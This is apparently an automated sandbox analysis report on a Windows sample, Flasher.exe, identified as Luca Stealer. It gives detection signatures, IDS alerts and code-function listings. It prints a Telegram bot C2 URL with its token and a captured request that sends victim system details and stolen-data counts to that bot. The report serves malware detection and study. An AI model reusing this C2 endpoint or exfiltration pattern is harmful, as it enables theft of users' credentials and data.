Edit tour

Windows Analysis Report
Flasher.exe

Overview

General Information

Sample name:	Flasher.exe
Analysis ID:	1581484
MD5:	7a16f2f0629a440695945db2a191c6a1
SHA1:	067c54721377eeefd199acb37402308bdfe73b3b
SHA256:	989af492fa898868e67636bf47e06a7c5864f31849fc3b3a07b07e7a3a62d944
Tags:	exeuser-aachum
Infos:

Detection

Luca Stealer, Rusty Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Luca Stealer

Yara detected Rusty Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses the Telegram API (likely for C&C communication)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

Flasher.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\Flasher.exe" MD5: 7A16F2F0629A440695945DB2A191C6A1)

powershell.exe (PID: 7396 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: Luca Stealer

{"C2 url": "https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Flasher.exe	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
Process Memory Space: Flasher.exe PID: 7284	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
Process Memory Space: Flasher.exe PID: 7284	JoeSecurity_RustyStealer	Yara detected Rusty Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.Flasher.exe.7ff6d34f0000.0.unpack	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security
0.2.Flasher.exe.7ff6d34f0000.0.unpack	JoeSecurity_LucaStealer	Yara detected Luca Stealer	Joe Security

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Flasher.exe", ParentImage: C:\Users\user\Desktop\Flasher.exe, ParentProcessId: 7284, ParentProcessName: Flasher.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 7396, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Possible Generic RAT over Telegram API

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T21:48:09.220898+0100	2029323	1	Malware Command and Control Activity Detected	192.168.2.4	49737	149.154.167.220	443	TCP

ET MALWARE Win32/Luca Stealer Sending System Information via Telegram (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T21:48:09.220898+0100	2044524	1	A Network Trojan was detected	192.168.2.4	49737	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T21:48:09.220898+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49737	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Flasher.exe

Avira: detected

Found malware configuration

Source: Flasher.exe

Malware Configuration Extractor: Luca Stealer {"C2 url": "https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: Flasher.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3512398 CryptUnprotectData,GetLastError,	0_2_00007FF6D3512398
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D357C7E4 BCryptGenRandom,BCryptGenRandom,	0_2_00007FF6D357C7E4
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D353034F BCryptGenRandom,BCryptGenRandom,HeapFree,	0_2_00007FF6D353034F
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D357C87B BCryptGenRandom,	0_2_00007FF6D357C87B

Source: unknown	HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: Flasher.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: rust_stealer_xss.pdb source: Flasher.exe

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D35DF7C0 CloseHandle,memset,FindFirstFileW,FindClose,HeapFree,

0_2_00007FF6D35DF7C0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49737 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2044524 - Severity 1 - ET MALWARE Win32/Luca Stealer Sending System Information via Telegram (GET) : 192.168.2.4:49737 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1accept: /host: ipwho.is
Source: global traffic	HTTP traffic detected: GET /bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-4662852241&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20YT3TY%20(1280,%201024)%0AHWID:%205676401068884178%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Flasher.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416content-length: 938714accept: /host: api.telegram.org

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 108.181.61.49 108.181.61.49

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipwho.is

Source: Network traffic

Suricata IDS: 2029323 - Severity 1 - ET MALWARE Possible Generic RAT over Telegram API : 192.168.2.4:49737 -> 149.154.167.220:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1accept: /host: ipwho.is
Source: global traffic	HTTP traffic detected: GET /bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-4662852241&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20YT3TY%20(1280,%201024)%0AHWID:%205676401068884178%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Flasher.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416content-length: 938714accept: /host: api.telegram.org

Source: global traffic	DNS traffic detected: DNS query: ipwho.is
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Flasher.exe	String found in binary or memory: https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML
Source: Flasher.exe	String found in binary or memory: https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML0
Source: Flasher.exe, 00000000.00000003.1760743375.000001EE77951000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1760408069.000001EE778EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-466
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Flasher.exe, 00000000.00000003.1760408069.000001EE77891000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000002.1761203830.000001EE77891000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Flasher.exe	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35783A7 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,WSAIoctl,WSAGetLastError,	0_2_00007FF6D35783A7
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35DC360 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	0_2_00007FF6D35DC360
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3577C87 NtDeviceIoControlFile,RtlNtStatusToDosError,	0_2_00007FF6D3577C87
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35D5C30 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,MultiByteToWideChar,WriteConsoleW,WriteConsoleW,GetLastError,GetLastError,	0_2_00007FF6D35D5C30
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3527FBA HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,HeapFree,CreateDCW,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,DeleteDC,memset,EnumDisplaySettingsExW,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,RtlFreeHeap,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,memmove,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,memmove,memmove,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,HeapFree,memmove,memmove,memmove,memmove,HeapFree,HeapFree,memmove,HeapFree,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,HeapFree,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,HeapFree,CloseHandle,	0_2_00007FF6D3527FBA
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35DCF00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	0_2_00007FF6D35DCF00
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35E2360 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	0_2_00007FF6D35E2360
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35765B1 NtCancelIoFileEx,RtlNtStatusToDosError,	0_2_00007FF6D35765B1

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D3577C87: NtDeviceIoControlFile,RtlNtStatusToDosError,

0_2_00007FF6D3577C87

Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35F83DC	0_2_00007FF6D35F83DC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35142D8	0_2_00007FF6D35142D8
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D354E215	0_2_00007FF6D354E215
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36FB910	0_2_00007FF6D36FB910
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D367A7F8	0_2_00007FF6D367A7F8
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35E26B0	0_2_00007FF6D35E26B0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352257A	0_2_00007FF6D352257A
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D34F3568	0_2_00007FF6D34F3568
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D370A58C	0_2_00007FF6D370A58C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3577C87	0_2_00007FF6D3577C87
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35FAC61	0_2_00007FF6D35FAC61
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3529D01	0_2_00007FF6D3529D01
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35B6CD6	0_2_00007FF6D35B6CD6
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35BFCD3	0_2_00007FF6D35BFCD3
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3550B9D	0_2_00007FF6D3550B9D
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35FDB71	0_2_00007FF6D35FDB71
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3502B57	0_2_00007FF6D3502B57
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D351BBEE	0_2_00007FF6D351BBEE
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3524A81	0_2_00007FF6D3524A81
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35CD99E	0_2_00007FF6D35CD99E
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35189DC	0_2_00007FF6D35189DC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35229CA	0_2_00007FF6D35229CA
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D367809C	0_2_00007FF6D367809C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35B50F7	0_2_00007FF6D35B50F7
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D34F1000	0_2_00007FF6D34F1000
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36DA020	0_2_00007FF6D36DA020
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3527FBA	0_2_00007FF6D3527FBA
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36F6D4C	0_2_00007FF6D36F6D4C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3506E32	0_2_00007FF6D3506E32
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D351EDB9	0_2_00007FF6D351EDB9
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D37364CD	0_2_00007FF6D37364CD
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35434B0	0_2_00007FF6D35434B0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35D445D	0_2_00007FF6D35D445D
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35DC470	0_2_00007FF6D35DC470
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3537470	0_2_00007FF6D3537470
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D373752F	0_2_00007FF6D373752F
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D356339E	0_2_00007FF6D356339E
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35133B2	0_2_00007FF6D35133B2
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D353034F	0_2_00007FF6D353034F
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35F53FC	0_2_00007FF6D35F53FC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35B2406	0_2_00007FF6D35B2406
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352A3D9	0_2_00007FF6D352A3D9
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35133E6	0_2_00007FF6D35133E6
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D37132D0	0_2_00007FF6D37132D0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35F6293	0_2_00007FF6D35F6293
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D351330D	0_2_00007FF6D351330D
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35C12E7	0_2_00007FF6D35C12E7
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35112C0	0_2_00007FF6D35112C0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352519E	0_2_00007FF6D352519E
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D37211EC	0_2_00007FF6D37211EC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3537140	0_2_00007FF6D3537140
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D357A220	0_2_00007FF6D357A220
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D360E20D	0_2_00007FF6D360E20D
